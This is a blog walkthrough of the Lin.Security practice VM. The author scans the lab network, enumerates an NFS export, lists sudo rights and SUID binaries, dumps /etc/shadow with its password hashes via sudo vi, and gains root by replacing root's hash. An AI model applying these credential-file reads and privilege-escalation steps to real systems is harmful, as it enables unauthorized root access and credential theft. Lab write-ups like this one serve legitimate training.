Lin.Security 1
I'm going to try to finish my initial VM list from way back when I started this blog within the next week and move onto learning some Windows shit. It's 2021 and still, most corporate networks and using Windows.
Recon
- VM published 11 Jul, 2018
- Author is a Pentesting company, website still up and appears to be active
- They give us initial credentials on their website:
bob/secret - Image is Ubuntu 18.04 LTS I'm assuming if they give us initial credentials, this one actually isn't going to be a web attack!
Enumeration
└─$ sudo nmap -nP 10.10.10.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 11:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.000079s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:64:8F:E2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.6
Host is up (0.000064s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.4
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.25 seconds
Alright well, it looks like we have a little more than just an ssh login - nfs is always fun! I suppose I'll make sure to try every path I see and at least start a scanner against this:
msf6 > search nfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/freebsd/nfsd/nfsd_mount normal No FreeBSD Remote NFS RPC Request Denial of Service
1 auxiliary/scanner/nfs/nfsmount normal No NFS Mount Scanner
2 exploit/netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
3 exploit/osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit
4 exploit/windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
5 exploit/windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow
6 exploit/windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow
7 exploit/windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow
Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/nfs/xlink_nfsd
msf6 > use 1
msf6 auxiliary(scanner/nfs/nfsmount) > info
Name: NFS Mount Scanner
Module: auxiliary/scanner/nfs/nfsmount
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module scans NFS mounts and their permissions.
References:
https://cvedetails.com/cve/CVE-1999-0170/
http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 10.10.10.6
RHOSTS => 10.10.10.6
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 10.10.10.6:111 - 10.10.10.6 NFS Export: /home/peter [*]
[*] 10.10.10.6:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Let's now login to the machine with our given credential and poke around a bit:
$ ssh bob@10.10.10.6
Cool banner!
bob@linsecurity:~$ ls -al
total 28
drwxr-xr-x 4 bob bob 4096 Jul 10 2018 .
drwxr-xr-x 5 root root 4096 Jul 9 2018 ..
-rw-r--r-- 1 bob bob 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 bob bob 3771 Apr 4 2018 .bashrc
drwx------ 2 bob bob 4096 Jul 9 2018 .cache
-rw-rw-r-- 1 bob bob 0 Jul 9 2018 .cloud-locale-test.skip
drwx------ 3 bob bob 4096 Jul 9 2018 .gnupg
-rw-r--r-- 1 bob bob 807 Apr 4 2018 .profile
Nothing interesting in home directory.
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
/usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
/usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
Oh sweet jesus that's a lot of gtfobins we can run as root... Do any of them have SUID set?
$ find directory -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
...
bob@linsecurity:/$ cat /tmp/filename
-rwsr-xr-x 1 root root 40152 Nov 30 2017 ./snap/core/4917/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/4917/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/4917/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17 2017 ./snap/core/4917/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 ./snap/core/4917/bin/umount
-rwsr-xr-x 1 root root 71824 May 17 2017 ./snap/core/4917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17 2017 ./snap/core/4917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17 2017 ./snap/core/4917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17 2017 ./snap/core/4917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17 2017 ./snap/core/4917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul 4 2017 ./snap/core/4917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 ./snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18 2018 ./snap/core/4917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 98440 Jun 21 2018 ./snap/core/4917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 ./snap/core/4917/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Nov 30 2017 ./snap/core/4486/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/4486/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/4486/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17 2017 ./snap/core/4486/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 ./snap/core/4486/bin/umount
-rwsr-xr-x 1 root root 71824 May 17 2017 ./snap/core/4486/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17 2017 ./snap/core/4486/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17 2017 ./snap/core/4486/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17 2017 ./snap/core/4486/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17 2017 ./snap/core/4486/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul 4 2017 ./snap/core/4486/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 ./snap/core/4486/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18 2018 ./snap/core/4486/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 94344 Apr 16 2018 ./snap/core/4486/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 ./snap/core/4486/usr/sbin/pppd
-rwsr-xr-x 1 root root 64424 Mar 9 2017 ./bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 ./bin/fusermount
-rwsr-xr-x 1 root root 26696 May 16 2018 ./bin/umount
-rwsr-xr-x 1 root root 146128 Nov 30 2017 ./bin/ntfs-3g
-rwsr-xr-x 1 root root 44664 Jan 25 2018 ./bin/su
-rwsr-xr-x 1 root root 43088 May 16 2018 ./bin/mount
-rwsr-xr-x 1 root root 22520 Mar 27 2018 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 18640 Oct 27 2016 ./usr/bin/netkit-rlogin
-rwsr-x--- 1 root itservices 18552 Apr 10 2018 ./usr/bin/xxd
-rwsr-xr-x 1 root root 37136 Jan 25 2018 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 40344 Jan 25 2018 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 18 2018 ./usr/bin/sudo
-rwsr-xr-x 1 root root 22728 Oct 27 2016 ./usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 76496 Jan 25 2018 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2018 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2018 ./usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Mar 9 2017 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Jan 25 2018 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 14504 Oct 27 2016 ./usr/bin/netkit-rsh
-rwsr-sr-x 1 root root 30800 May 16 2018 ./usr/bin/taskset
-rwsr-xr-x 1 root root 59640 Jan 25 2018 ./usr/bin/passwd
-rwsr-xr-x 1 root root 10232 Mar 28 2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 80056 Jun 5 2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 436552 Feb 10 2018 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27 2018 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 101208 May 16 2018 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 113336 Jan 16 2018 ./sbin/mount.nfs
We can run an editor as root though... so this means we have full read access to the entire system, let's use that to dig a bit deeper shall we?
$ sudo vi /etc/shadow
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
pkexecbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::
Recap
- SSH on port 22
- nfs on port 2049
- rpcbind on 111
- There's an NFS mount at
/home/peter - We can run quite a few commands as root (including an editor), this should be very useful for us
Exploitation
I should be able to just edit /etc/shadow toset my own password for root...
# Create a sha-512 hashed password:
$ mkpasswd -m sha-512 -S saltsalt -s
Password: password
$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/
bob@linsecurity:/$ sudo vi /etc/shadow
... changed root hash line to:
root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::
# Login with password password
bob@linsecurity:/$ su
Password:
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)
We win! There's probably a ton of ways to win this one, but I don't really care I just want quick roots to finish off these linux boxes. EASY!